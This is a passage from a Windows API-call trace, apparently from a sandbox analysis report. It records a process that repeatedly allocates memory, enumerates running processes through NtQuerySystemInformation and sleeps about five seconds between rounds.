ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0154.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0154.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0154.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0154.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0154.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0154.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0155.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0155.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0155.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0155.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0155.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0155.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, 